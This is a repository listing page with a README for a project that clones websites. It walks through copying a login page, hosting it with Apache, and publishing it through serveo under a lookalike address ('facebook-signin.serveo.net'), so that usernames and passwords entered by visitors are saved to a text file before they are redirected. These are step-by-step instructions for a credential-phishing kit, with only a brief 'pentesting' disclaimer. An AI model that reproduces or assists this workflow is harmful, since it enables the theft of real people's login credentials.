https://github.com/yei-linux/scrapping-clonning-pages
This project is for clonning pages and get the data input them.We use serveo to do our cloned page global.
https://github.com/yei-linux/scrapping-clonning-pages
Last synced: 3 months ago
JSON representation
This project is for clonning pages and get the data input them.We use serveo to do our cloned page global.
- Host: GitHub
- URL: https://github.com/yei-linux/scrapping-clonning-pages
- Owner: Yei-Linux
- Created: 2019-09-17T18:21:57.000Z (over 5 years ago)
- Default Branch: master
- Last Pushed: 2019-09-17T18:51:31.000Z (over 5 years ago)
- Last Synced: 2025-01-19T08:35:28.839Z (5 months ago)
- Language: HTML
- Size: 643 KB
- Stars: 1
- Watchers: 2
- Forks: 0
- Open Issues: 1
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# Scrapping-Clonning-Pages
This project is for clonning pages and get the data input them.We use serveo to do our cloned page global.INSTALL REQUIREMENTS.TXT:
-------------------------First we have to do:
```
pip install requirements.txt
```RUNNING SCRIPT:
--------------
Our script have written the URI but we can change it.After that we can run it and content of page will save it in directory FILES_CLONNED/templates(index.html):
![]()
![]()
USE APACHE:
----------
Now turn on apache and put the directory Templates in htdocs:
![]()
![]()
CONFIGURE PROJECT:
------------------
Now configure the project templates in htdocs like this:
![]()
USE SSH SERVEO:
--------------
With ssh serveo we can put our page in Internet(this service expire in 30-45 min):
![]()
ACCESS INTO OUR CLONED PAGE:
---------------------------
Access into our page with the link and put data in login:```
facebook-signin.serveo.net
```
![]()
AFTER OF ACCESSING INTO OUR CLONED PAGE:
---------------------------------------
When we click on login this redirect to youtube(example but you can change the URI),then USER and PASSWORD will save it
into data.txt(in our directory htdocs/templates/):
![]()
![]()
![]()
FINALLY....:
------------
This project is only for pentesting and learning Scrapping.